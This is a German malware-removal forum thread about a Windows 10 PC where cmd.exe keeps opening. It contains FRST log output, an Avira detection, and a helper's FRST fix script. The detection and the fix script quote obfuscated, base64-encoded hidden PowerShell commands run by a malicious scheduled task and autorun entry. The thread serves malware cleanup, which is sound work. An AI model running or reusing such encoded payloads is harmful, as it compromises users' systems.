FirewallRules: [UDP Query User{567761A1-FD0A-4569-BA70-182A4CD61344}C:\users\chris\appdata\roaming\energy\energy.exe] => (Block) C:\users\chris\appdata\roaming\energy\energy.exe (Energy ltd) [Datei ist nicht signiert]
FirewallRules: [{EEDEE0EF-B18C-4563-A5AC-6E93FCA80E32}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Democracy 4\Democracy4.exe () [Datei ist nicht signiert]
FirewallRules: [{0578E3EF-F4BF-4F9E-8526-5E6BB73A29E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Democracy 4\Democracy4.exe () [Datei ist nicht signiert]
FirewallRules: [{414B48FD-BBD7-4226-821F-9495449B3F1E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{FF6D9E45-7691-4CE1-8EE6-261C7298D74C}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{1A3C0D0A-B0EA-4ED1-996D-52653AEAE727}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D8EF2999-53CA-4384-9F14-940B39C3C02F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{511363E9-DBF8-4CCE-9A58-E93351E92938}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [UDP Query User{79FA9350-5546-48C4-B3CA-9AFEB76857A3}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [{6C8262C7-8BBB-4EF7-8537-F736A247F4B2}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{83CF03A9-F32B-4A78-BC81-6762F40C2A28}] => (Allow) C:\Users\chris\AppData\Local\Programs\Opera\88.0.4412.74\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [{8091FDC1-5700-43DC-A6C6-F891A9173B40}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{F4021ACF-8C9B-4F7D-9237-A18C7FF0000E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{9A7E4389-2BB0-42DC-B39F-69A642BC124C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{9C9E9778-2FD9-478C-8C59-076EBE803640}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{6822110D-3CA2-4A70-8406-EBF18D8D9543}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{65CAE363-1032-428D-B50D-CBA4F52A3934}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{551771CB-ED84-4DD8-8080-865BCEFE3F60}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{AD71D103-BB36-405B-9A2D-4B7A4F5D7F19}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{4F96B161-8695-43FB-B2E5-F5B938A9583F}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.62\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3F5E8E8D-90FB-4533-98B9-CDA7854DB328}] => (Allow) C:\Users\chris\AppData\Local\Programs\Opera\89.0.4447.48\opera.exe (Opera Norway AS -> Opera Software)

==================== Wiederherstellungspunkte =========================

03-07-2022 21:01:34 Geplanter Prüfpunkt
11-07-2022 17:56:38 Geplanter Prüfpunkt
14-07-2022 17:44:21 Windows Modules Installer

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (07/19/2022 12:02:51 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/18/2022 06:55:46 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (07/18/2022 06:52:43 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/17/2022 09:40:50 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/17/2022 05:48:17 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (07/15/2022 01:47:53 AM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/15/2022 01:43:52 AM) (Source: Microsoft-Windows-PerfNet) (EventID: 2002) (User: NT-AUTORITÄT)
Description: Das Redirectordienst-Leistungsobjekt kann nicht geöffnet werden. Die ersten vier Bytes (DWORD) des Datenabschnitts enthalten den Statuscode.

Error: (07/15/2022 01:43:52 AM) (Source: Microsoft-Windows-PerfNet) (EventID: 2004) (User: NT-AUTORITÄT)
Description: Das Serverdienst-Leistungsobjekt kann nicht geöffnet werden. Die ersten vier Bytes (DWORD) des Datenabschnitts enthalten den Statuscode.


Systemfehler:
=============
Error: (07/19/2022 12:02:49 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎18.‎07.‎2022 um 23:35:07 unerwartet heruntergefahren.

Error: (07/18/2022 06:52:42 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎18.‎07.‎2022 um 18:51:53 unerwartet heruntergefahren.

Error: (07/17/2022 09:40:49 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: Der Computer wurde nach einem schwerwiegenden Fehler neu gestartet. Der Fehlercode war: 0x00000133 (0x0000000000000000, 0x0000000000000501, 0x0000000000000500, 0xfffff8034ecfb320). Ein volles Abbild wurde gespeichert in: C:\Windows\MEMORY.DMP. Berichts-ID: bb3cc2dd-e46d-4f84-a15f-7325b422884d.

Error: (07/17/2022 09:40:42 PM) (Source: volmgr) (EventID: 161) (User: )
Description: Erstellung einer Abbilddatei aufgrund eines Fehlers beim Erstellen der Abbildkopie fehlgeschlagen.

Error: (07/17/2022 09:40:48 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎17.‎07.‎2022 um 20:52:24 unerwartet heruntergefahren.

Error: (07/15/2022 12:11:53 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-5G99FIR)
Description: Der Server "{FD06603A-2BDF-4BB1-B7DF-5DC68F353601}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (07/15/2022 01:47:21 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-5G99FIR)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (07/15/2022 01:47:13 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-5G99FIR)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}


Windows Defender:
================
Date: 2022-07-19 00:05:17
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {D0E01182-88A3-4FBE-B873-0F77F12EEE2F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2022-07-18 23:29:03
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {FDBAB32A-5E89-41A6-9C99-0843B6FA6A05}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2022-07-17 19:50:38
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3AB61364-FDB3-4647-9B30-4B5FCC63F9D1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Event[0]:

Date: 2022-07-14 23:24:34
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2022-07-14 23:16:15
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2021-01-05 13:12:59
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.158.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x8024001e
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support". 

CodeIntegrity:
===============
Date: 2022-07-19 12:06:10
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Avira\Endpoint Protection SDK\amsi\x64\avamsi.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. 3103 06/17/2020
Hauptplatine: ASUSTeK COMPUTER INC. ROG STRIX B450-F GAMING
Prozessor: AMD Ryzen 7 3700X 8-Core Processor 
Prozentuale Nutzung des RAM: 27%
Installierter physikalischer RAM: 32694.54 MB
Verfügbarer physikalischer RAM: 23721.06 MB
Summe virtueller Speicher: 37558.54 MB
Verfügbarer virtueller Speicher: 25088.28 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.96 GB) (Free:511.83 GB) (Model: KINGSTON SA2000M81000G) NTFS
Drive d: (HDD-Festplatte) (Fixed) (Total:1863.01 GB) (Free:1858.04 GB) (Model: ST2000DM008-2FR102) NTFS

\\?\Volume{1b5d4295-0000-0000-0000-100000000000}\ (System-reserviert) (Fixed) (Total:0.05 GB) (Free:0.02 GB) NTFS
\\?\Volume{1b5d4295-0000-0000-0000-80c0e8000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 51DDC66D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 1B5D4295)
Partition 1: (Active) - (Size=50 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=515 MB) - (Type=27)

==================== Ende von Addition.txt =======================
         

Geändert von cosinus (19.07.2022 um 13:39 Uhr) Grund: code tags

Alt 19.07.2022, 13:38   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Zitat:
dass es sich um einen potenziellen Trojaner handelt.
Was sollen wir mit solchen unkonkreten Angaben bitte anfangen
sinnigerweise musst du schon posten WAS genau WO genau gefunden wurde.
__________________

__________________

Alt 19.07.2022, 19:59   #3
M-K-D-B
/// TB-Ausbilder
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



@g0s:
Es bringt nichts, die powershell zu löschen, weil Windows die Systemdatei selbst wiederherstellt.
Es ist ja auch nicht die powershell die "schädliche Datei", sie wird nur von der Malware missbraucht, genau wie die cmd.


@cosinus:
Avira erkennt die Adware nicht. Habs bereits an die Entwickler von AdwCleaner gemeldet, aber die sind gerade noch im Urlaub... dauert also noch etwas.
Musste wohl doch selber mit FRST entfernen.
__________________

Alt 19.07.2022, 20:08   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Ich will einfach der Vollständigkeit halber vernünftige Meldungen und keinen unkonkreten Dünnschiss
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.07.2022, 20:28   #5
M-K-D-B
/// TB-Ausbilder
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Zitat:
Zitat von cosinus Beitrag anzeigen
Ich will einfach der Vollständigkeit halber vernünftige Meldungen und keinen unkonkreten Dünnschiss
Ist doch jetzt nicht so wichtig, wir sehen die Malware ja in den Logdateien (siehe auch intern).

Auf gehts!


Alt 20.07.2022, 00:54   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Nein, das ist schon wichtig, und diese Regel ist auch hier im TB verankert.
Nachher meint er noch irgendwas anderes als wir. Meldungen von Virenscannern müssen immer gepostet werden, ohne Wenn und Aber.
__________________
--> Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber

Alt 20.07.2022, 16:33   #7
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Obgleich ich hier offenbar auf Hilfsbereitschaft treffe, würde ich mich sehr freuen, wenn mein Anliegen nicht als "Dünnschiss" betitelt wird.

Jetzt aber zu dem, was Avira mir ausspuckt(da es gerade wieder zu einer Meldung kam):
Code:
ATTFilter
Dateiname: powershell.exe
Name der Bedrohung: TR/SensorBased
Typ:Trojaner
Pfad:C:\Windows \...\WindoesP
Übergeordnet:C:\Windows\System32\cmd.exe
Auslöser:cmdline=-windowstyle hidden -e "cgakaaoajab0aguaeab0aeeacwbjad0awwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoaqqbtaemasqbjadsacgakaaoajabqahaapqakag4adqbsagwaowakaaoazgb1ag4aywb0agkabwbuacaazwblahqadablahiargb1ag4aywaoafsacwb0ahiaaqbuagcaxqakagiadabzadiakqagahsacgajacqaygb0ahmapqbbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabiahqacwayackaowakaaoacqakahmadaa9acqadablahgadabbahmaywauaecazqb0aeiaeqb0aguacwaoaccarwblahqalqbjahqazqbtafaacgbvahaazqbyahqaeqbwageabab1aguajwapadsacgajacqazqbkad0ajabiahqacwbbadaalgauadqaxqa7aaoacgajacqaaqa9adaaowakaakajabsad0ajablagqalgbmaguabgbnahqaaaa7aaoacqakagsapqbaacgakqa7aaoacgajafsayqbyahiayqb5af0aoga6afiazqbzagkaegblacgawwbyaguazgbdacqaawasacqacwb0ac4abablag4azwb0aggakqa7aaoacqbmag8acgblageaywboacgajabiacaaaqbuacaajabzahqakqagahsajabrafsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajablagqawwakagkajqakagwaxqb9aaoacgajacqaygbzad0ajabiahqacwbbadualgauacqaygb0ahmalgbsaguabgbnahqaaabdadsacgakaakajabpad0amaa7aaoacqakagwapqakagsalgbmaguabgbnahqaaaa7aaoacqakagqadaa9aeaakaapadsacgakaakawwbhahiacgbhahkaxqa6adoaugblahmaaqb6aguakabbahiazqbmaf0ajabkahqalaakagiacwauagwazqbuagcadaboackaowakaakazgbvahiazqbhagmaaaaoacqaygagagkabgagacqaygbzackaiab7acqazab0afsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajabrafsajabpacuajabsaf0afqakaaoacqbyaguadab1ahiabgagacqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgajabkahqakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9aaoacgakacqadgagad0aiaaiadaaiga7aaoajabsahyaiaa9acaaiga4aciaowakacqazaagad0aiaaiagkacgbpag4azwb0agcayqbuagqabqbvahqaaqb2ac4aeab5ahoaiga7aaoajablahaaiaa9acaaigbxahkasqawae0arabzadiatqb6agmamgbnafqaawaxae4aagbfahoatqbeaeuanaboagoasqbpaewarabfadiatgbuae0aegbnahoasqa0ae4avabgagqaiga7aaoacgakagcacaboageabqblacaapqagaciasablaemavqa6afwauwbvagyadab3ageacgblafwaqgbpag4ayqbyahkargbvahiadabyaguacwbzafmabwbmahqadwbhahiazqbcaciaowakaaoadabyahkaiab7aaoacqakagoacaa9acqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqazqbwackakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9acaaywbhahqaywboahsafqakaaoajabqagqaiaa9acaajabuahuababsadsacgakaaoajabhacaapqagacqadablahgadabbahmaywa7aaoacgakahiaawblahkatgagad0aiaaiaeqaaqbzahaababhahkaiabgahuacwbpag8abgaiadsacgakahuapqakagoacabbadaaxqa7aaoajabpahmapqakagoacabbadeaxqa7aaoacgb3aggaaqbsaguakaakahqacgb1aguakqagahsacgajahqacgb5acaaewakaakacqb0ahiaeqagahsacgajaakacqbpagyaiaaoaceakabuaguacwb0ac0auabhahqaaaagacqazwbwae4ayqbtaguakqapacaaewakaakacqajaakatgblahcalqbjahqazqbtacaalqbqageadaboacaajabnahaatgbhag0azqagahwaiabpahuadaatae4adqbsagwaowakaakacqajah0acgajaakafqbjageadabjaggaewb9aaoacgajaakajablahgaiaa9acaajabmageababzaguaowakaaoacqajagkazgagacgajabqagqaiaataguacqagacqabgb1agwabaapacaaewakaakacqajahqacgb5acaaewakaakacqajaakajabyacaapqagaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkavgbhagwadqblacaalqbqageadaboacaajabnahaatgbhag0azqagac0atgbhag0azqagacqacgbraguaeqboadsacgajaakacqajacqaagbkacaapqagagcazqb0ahqazqbyaeyadqbuagmakaakahiakqa7aaoacgajaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacgajaakacqajacqazqb4acaapqagacqadabyahuazqa7aaoacqajaakafqbjageadabjaggaewb9aaoacqajah0aiablagwacwblacaaewakaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacqajah0acgakaakacqb0ahiaeqagahsacgajaakacqakagqadaagad0aiab3agcazqb0acaaigboahqadabwahmaogavac8ajabkac8aeaa/ahuapqakahuajgbpahmapqakagkacwamagwadga9acqabab2acyacgb2ad0ajab2aciaiaatafuacwblaeiayqbzagkaywbqageacgbzagkabgbnadsacgakaakacqajacqaagbkadiaiaa9acaazwblahqadablahiargb1ag4aywaoacqazab0ackaowakaakacqajagkazgagacgajabqagqamgbbadaaxqagac0azwb0acaajab2ackaiab7aaoacqajaakacqakahyamgagad0aiaakagoazaayafsamabdadsacgakaakacqajaakatgblahcalqbjahqazqbtafaacgbvahaazqbyahqaeqagac0auabhahqaaaagacqazwbwae4ayqbtaguaiaatae4ayqbtaguaiaakahiaawblahkatgagac0avgbhagwadqblacaajabkahqaiaatafaacgbvahaazqbyahqaeqbuahkacablacaaigbtahqacgbpag4azwaiacaalqbgag8acgbjaguaiab8acaatwb1ahqalqboahuababsadsacgajaakacqajacqaagbkacaapqagacqaagbkadiaowakaakacqajaakajablahgaiaa9acaajab0ahiadqbladsacgajaakacqb9aaoacqajah0aywbhahqaywboahsafqakaaoacqajagkazgagacgajablahgaiaataguacqagacqadabyahuazqapacaaewakaakacqajahqacgb5ahsacgajaakacqajahmadabvahaaowakaakacqajah0aywbhahqaywboahsafqakaaoacqajaakadabyahkaiab7aaoacqajaakacqbpaguaeaagacqaagbkafsamqbdadsacgajaakacqb9agmayqb0agmaaab7ah0acgajaakafqakaakafqagagmayqb0agmaaab7ah0acgakaakadabyahkaiab7aaoacqajacqacwbsahmaiaa9acaakaaoagcazqb0ac0acgbhag4azabvag0aiaa3adaaiaatag0aaqbuagkabqb1ag0aiaa1adaakqaqadyamaapadsacgajaakajab0ahmaiaa9acaawwbpag4adabdacgarwblahqalqbeageadablacaalqbvaeyabwbyag0ayqb0acaajqbzackaowakaaoacqajadoacwbsacaadwboagkabablacgajab0ahiadqblackaiab7aaoacqajaakadabyahkaewakaakacqajaakacgb1ag4akaakagqalaakahualaakagkacwapadsacgajaakacqb9agmayqb0agmaaab7ah0acgakaakacqajafmadabhahiadaatafmabablaguacaagacgazwblahqalqbyageabgbkag8abqagadyanqagac0abqbpag4aaqbtahuabqagadianqapadsacgajaakacqakahqacwayacaapqagafsaaqbuahqaxqaoaecazqb0ac0arabhahqazqagac0avqbgag8acgbtageadaagacuacwapadsacgakaakacqajagkazgagacgakaakahqacwayac0ajab0ahmakqagac0azwb0acaajabzagwacwapacaaewakaakacqajaakaygbyaguayqbracaacwbsadsacgajaakacqb9aaoacqajah0acgajah0aiabjageadabjaggaewb9aaoafqa=",filename=powershell.exe,silent=1
         
Ich hoffe das hilft.
Ich habe auch versucht die Logdateien von einem Avira-Scan zu bekommen, aber ich finde leider keinen weg zu diesen

Geändert von cosinus (20.07.2022 um 20:06 Uhr) Grund: code tags

Alt 20.07.2022, 20:01   #8
M-K-D-B
/// TB-Ausbilder
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Danke für die Infos.




Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    SystemRestore: On 
    CreateRestorePoint:
    CloseProcesses:
    HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Energy] => C:\Users\chris\AppData\Roaming\Energy\Energy.exe [134333464 2022-05-23] (Energy ltd) [Datei ist nicht signiert] <==== ACHTUNG
    C:\Users\chris\AppData\Roaming\Energy
    Task: {06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8} - System32\Tasks\chrome history => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AH (Der Dateneintrag hat 4871 mehr Zeichen). <==== ACHTUNG
    C:\Users\chris\AppData\Local\chrome_history
    
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Synapse3] => [X]
    HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [] => [X]
    HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (Keine Datei)
    HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Uninstall 21.180.0905.0007] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\21.180.0905.0007" (Keine Datei)
    HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ACHTUNG (Beschränkung - Zones)
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
    FF Plugin HKU\S-1-5-21-292222086-413629167-3624375346-1001: jpl.nasa.gov/NASAEyes -> D:\Uni\NASA's Eyes\npNASAEyes.dll [Keine Datei]
    HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Energy"
    
    startpowershell:
    Set-Service -Name "BITS" -StartupType Manual -Verbose
    Set-Service -Name "Dhcp" -StartupType Automatic -Verbose
    Set-Service -Name "EventLog" -StartupType Automatic -Verbose
    Set-Service -Name "EventSystem" -StartupType Automatic -Verbose
    Set-Service -Name "nsi" -StartupType Automatic -Verbose
    Set-Service -Name "RasMan" -StartupType Manual -Verbose
    Set-Service -Name "SDRSVC" -StartupType Manual -Verbose
    Set-Service -Name "SstpSvc" -StartupType Manual -Verbose
    Set-Service -Name "TrustedInstaller" -StartupType Manual -Verbose
    Set-Service -Name "VSS" -StartupType Manual -Verbose
    Set-Service -Name "Winmgmt" -StartupType Automatic -Verbose
    Set-Service -Name "wuauserv" -StartupType Manual -Verbose
    
    Set-MpPreference -DisableAutoExclusions $true -Force
    set-mppreference -mapsreporting basic -Force
    set-mppreference -DisableRealtimeMonitoring $false -Force
    set-mppreference -DisablePrivacyMode $true -Force
    set-mppreference -DisableIOAVProtection $false -Force
    set-mppreference -CheckForSignaturesBeforeRunningScan $true -Force
    set-mppreference -PUAProtection enabled -Force
    Set-MpPreference -DisableBehaviorMonitoring $false -Force
    Set-MpPreference -SignatureScheduleDay Everyday -force
    set-mppreference -RealTimeProtectionEnabled $true -force
    set-mppreference -OnAccessProtectionEnabled $true -force
    
    Function Remove-all-windefend-excludes {
    $Paths=(Get-MpPreference).ExclusionPath
    $Extensions=(Get-MpPreference).ExclusionExtension
    $Processes=(Get-MpPreference).ExclusionProcess
    foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force}
    foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force}
    foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force}
    }
    Set-MpPreference -DisableAutoExclusions $true -Force
    Remove-all-windefend-excludes
    endpowershell:
    
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset catalog
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: netsh winhttp reset proxy
    CMD: Bitsadmin /Reset /Allusers
    CMD: Winmgmt /salvagerepository 
    CMD: Winmgmt /resetrepository 
    CMD: winmgmt /resyncperf
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    
    Hosts:
    RemoveProxy:
    C:\WINDOWS\SysWOW64\*.tmp
    C:\WINDOWS\System32\*.tmp
    C:\Windows\SystemTemp\*.tmp
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt auf den Button Reparieren.
